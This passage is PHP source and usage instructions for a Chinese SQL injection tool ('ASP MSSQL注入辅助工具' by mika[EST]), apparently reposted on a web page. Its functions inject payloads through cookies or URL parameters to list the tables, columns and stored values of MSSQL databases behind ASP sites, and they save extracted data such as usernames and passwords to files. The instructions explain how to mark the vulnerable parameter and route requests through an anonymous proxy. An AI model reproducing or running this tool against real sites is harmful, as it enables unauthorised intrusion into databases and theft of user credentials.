$temp.=dechex(ord($str[$i]))."00";
}
//echo $temp."\n";
return $temp;
}
///////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////
//暴取表名函数
function exploit_tab(){
global $bstr,$cookie,$tab_exp,$count_table,$curl;
$table=Null;
$temp=Null;
init_session();
if($bstr)
$new_cookie=str_replace('MIKA','%27'.$count_table,$cookie);
else
$new_cookie=str_replace('MIKA',$count_table,$cookie);
output_start();
if($re=find_value($new_cookie)){
echo "<b>Number of tables:</b><font color=blue>$re</font>\n";
}
/*do{
if($table==Null){
$new_url=str_replace('MFM_TABLES',"''",$tab_exp);
}
else{
$new_url=str_replace('MFM_TABLES',$temp,$tab_exp);
}
if($bstr)
$new_cookie=str_replace('MIKA','%27'.$new_url,$cookie);
else
$new_cookie=str_replace('MIKA',$new_url,$cookie);
$re=find_value($new_cookie);
if($re)
{
$table=$re;
if($temp==Null){
//$temp="'".$table."'";
$temp=str2sqlhex($table);
}else{
//$temp.=","."'".$table."'";
$temp.=",".str2sqlhex($table);
}
fputs($table_file,"|------------ ".$table."\n");
echo "|------------ ".$table."\n";
}
}while($re);*/
explode_tab();
}
///////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////
//暴取字段函数
function exploit_field(){
global $bstr,$table_name,$cookie,$field_exp,$count_column,$curl;
$old_url=str_replace('TABLE_NAME',str2sqlhex($table_name),$field_exp);
$count_column=str_replace('MFM_TABLE_NAME',str2sqlhex($table_name),$count_column);
$num=1;
$i=0;
init_session();
if($bstr)
$new_cookie=str_replace('MIKA','%27'.$count_column,$cookie);
else
$new_cookie=str_replace('MIKA',$count_column,$cookie);
output_start();
if($total=$re=find_value($new_cookie)){
echo "<b>Number of columns in $table_name:</b><font color=blue>$re</font>\n";
}
output_th('tr');
for($i=0;$i<4;$i )
output_th('Fields');
output_th('/tr');
output_td('tr');
do{
$temp=$old_url;
$new_url=str_replace('MFM_NUM',"$num",$temp);
if($bstr)
$new_cookie=str_replace('MIKA','%27'.$new_url,$cookie);
else
$new_cookie=str_replace('MIKA',$new_url,$cookie);
//echo $new_url."\n";
$re=find_value($new_cookie);
if($re){
output_td($re);
if(($num % 4)==0)
{
output_td('/tr');
output_td('tr');
}
}
$num ;
}while($num<=$total);
output_td('/tr');
output_end();
}
///////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////
//老方式暴取字段值的函数
function exploit_value(){
global $bstr,$table_name,$field_name,$cookie,$value_exp,$count_exp,$curl;
$value=Null;
$temp=Null;
$count_num=1;
$old=str_replace('MFM_TABLE_NAME',$table_name,$count_exp);
init_session();
if($bstr)
$new_cookie=str_replace('MIKA','%27'.$old,$cookie);
else
$new_cookie=str_replace('MIKA',$old,$cookie);
$re=find_value($new_cookie);
$record_file=fopen("records-$field_name.txt","w");
if($re)
{
$count=$re;
echo "the number of record in $table_name is: $count\n";
fputs($record_file,"the number of record in $table_name is: $count\n");
}
$old=str_replace('MFM_FIELD_NAME',$field_name,$value_exp);
$old=str_replace('MFM_TABLE_NAME',$table_name,$old);
//echo $old."\n";
do{
if($value==Null){
$new_url=str_replace('MFM_VALUE',"''",$old);
}
else{
$new_url=str_replace('MFM_VALUE',$temp,$old);
}
if($bstr)
$new_cookie=str_replace('MIKA','%27'.$new_url,$cookie);
else
$new_cookie=str_replace('MIKA',$new_url,$cookie);
$re=find_value($new_cookie);
if($re)
{
$value=$re;
echo "|------------ ".$value."\n";
fputs($record_file,"|------------ ".$value."\n");
if($temp==Null){
//$temp="'".urlencode($value)."'";
//$temp=urlencode("'".urlencode($value)."'");
$temp=str2sqlhex($value);
//echo $temp."\n";
}else{
//$temp.=","."'".urlencode($value)."'";
//$temp.=",".urlencode("'".urlencode($value)."'");
$temp.=",".str2sqlhex($value);
}
}else{echo "|------------ None\n";
fputs($record_file,"|------------ None\n");}
$count_num ;
}while($count_num<=$count);
fclose($record_file);
}
///////////////////////////////////////////////////////////////////////////////////////
?>
<?php
if(!array_key_exists('_submit',$_POST)){
?>
<center><h2><font color=blue>ASP MSSQL注入辅助工具 by mika[EST]</font></h2></center><br>
<div align=center>
<font color=red>只针对mssql数据库,且错误提示开启。</font><br>
<font color=blue>用法非常简单:</font><br>
<font color=blue>如果是<font color=red>cookie</font>注入的话,首先需要将实际获得<font color=red>cookie</font>填入"exploitable cookie"栏里。并在可注入的字段<font color=red>后面</font>加上<font color=red>MIKA</font>这个
个关键字,如下例所示,不要有空格。比如下面这个<font color=red>cookie:</font></font><br>
<font color=red>"my web=myset=template; ASPSESSIONIDCSRRARBS=PIHLHHPDOFMCKJIBBIMMLCJL"</font><br>
<font color=blue>其中myset这个字段没有过滤好,存在注入漏洞,那么你就需要在template后面加上MIKA这个关键字
因此"exploitable cookie"栏里应填入如下修改后的cookie值:</font><br>
<font color=red>$cookie="my web=myset=template<font color=red>MIKA</font>; ASPSESSIONIDCSRRARBS=PIHLHHPDOFMCKJIBBIMMLCJL";</font><br>
<font color=blue>"Exploitable Url"填存在漏洞的页面url地址。"referer url"填写http头里的referer字段的内容,一般情况下跟"Exploitable Url"
一样就可以了。
</font><br>
如果是<font color=red>url</font>注入的话,那么就不需要cookie和referer了,只需要在<font color=red>url</font>中的可注入字段的后面加上<font color=red>MIKA</font>这个关键字即可,比如:
http://www.mika520.net/vul.php?id=1<font color=red>MIKA</font><br>
<font color=blue>"Num Type"和"Char Type"是注入的类型,前者代表数值型,后者代表字符型,根据实际情况填写即可。<br>
"Explode Tables Of Current DataBase" 爆取当前数据库的所有表名。<br>
"Explode Fields Of" 爆取某个表的字段值,后面填上要暴取字段的表名.<br>
"Explode Values Of" 暴取某个表的字段值。后面两个文本框,从左到又依次填写字段名和表名。其中字段数可以一次填写多个,以逗号(",")隔开,比如:<br>
<font color=red>username,password,userid</font><br>
"Via Anonymous Proxy" 是选择是否使用匿名HTTP代理,代理地址格式为"127.0.0.1:8080".<br>
</font>
<font color=red>by mika[EST]</font><br>
</div>
<?php
}
?>
</body>
</html>
|
网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)